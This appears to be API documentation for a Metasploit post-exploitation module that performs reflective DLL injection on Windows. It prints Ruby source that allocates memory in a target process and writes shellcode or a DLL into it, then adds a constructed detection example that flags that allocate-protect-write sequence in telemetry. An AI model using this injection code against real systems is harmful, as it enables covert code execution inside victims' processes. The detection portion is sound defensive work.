Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes:
ReflectiveDLLLoader
Defined in:
lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim's machine.

Constant Summary

PAGE_ALIGN =
1024

Instance Method Summary

Methods included from ReflectiveDLLLoader

#load_rdi_dll

Instance Method Details

#inject_dll_into_process(process, dll_path) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 53

def inject_dll_into_process(process, dll_path)
  dll, offset = load_rdi_dll(dll_path)
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end

#inject_into_process(process, shellcode) ⇒ Fixnum

Inject the given shellcode into a target process.

Parameters:

Returns:

  • (Fixnum)

    Address of the shellcode in the target process's memory.


# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 28

def inject_into_process(process, shellcode)
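  shellcode_size = shellcode.length

  # Round the allocation size up to the next multiple of PAGE_ALIGN.
  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  # Allocate a region in the target process, set its protection,
  # then copy the bytes into it.
  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)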

  return shellcode_mem
end
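
From a detection standpoint, #inject_into_process leaves a fixed order of cross-process memory operations: allocate, protect, write, with the requested allocation size padded to a multiple of PAGE_ALIGN. The following is an added example, not Metasploit code; the event schema (src, dst, op, addr, size), the sample events and the function name are assumptions constructed for illustration.

```ruby
# Added defensive example; not part of Metasploit. The event schema is assumed.
PAGE_ALIGN = 1024 # same value as the constant documented above
SEQUENCE = %i[allocate protect write].freeze

# Constructed sample telemetry: one hash per memory operation on a process.
SAMPLE_EVENTS = [
  { src: 4012, dst: 812,  op: :allocate, addr: 0x2a0000, size: 5120 },
  { src: 4012, dst: 812,  op: :protect,  addr: 0x2a0000, size: 5120 },
  { src: 4012, dst: 812,  op: :write,    addr: 0x2a0000, size: 4730 },
  { src: 1500, dst: 1500, op: :allocate, addr: 0x510000, size: 4096 }, # own process
  { src: 2200, dst: 640,  op: :write,    addr: 0x7f0000, size: 64 },   # write only
  { src: 3300, dst: 900,  op: :allocate, addr: 0x330000, size: 2048 },
  { src: 3300, dst: 900,  op: :write,    addr: 0x330000, size: 2048 }  # no protect
].freeze

# Returns one finding per (src, dst, addr) where a foreign process performed
# allocate, protect and write, in that order, on the same base address.
def find_injection_sequences(events)
  progress = Hash.new(0) # [src, dst, addr] => number of SEQUENCE steps seen
  alloc_size = {}
  findings = []
  events.each do |e|
    next if e[:src] == e[:dst] # only cross-process activity is of interest
    key = [e[:src], e[:dst], e[:addr]]
    if e[:op] == :allocate
      progress[key] = 1
      alloc_size[key] = e[:size]
    elsif progress[key] > 0 && e[:op] == SEQUENCE[progress[key]]
      progress[key] += 1
    else
      next # out-of-order or unrelated operation
    end
    next unless progress[key] == SEQUENCE.length
    size = alloc_size[key]
    # A size that is a multiple of PAGE_ALIGN matches the padding done above;
    # treat it as corroborating detail, not as a signal on its own.
    findings << { src: e[:src], dst: e[:dst], addr: e[:addr], alloc_size: size,
                  padded: (size % PAGE_ALIGN).zero?, written: e[:size] }
    progress.delete(key)
  end
  findings
end
```

In the sample data the written length 4730 pads to 5120 under the rounding shown in #inject_into_process, which is why the first three events are reported with `padded: true`.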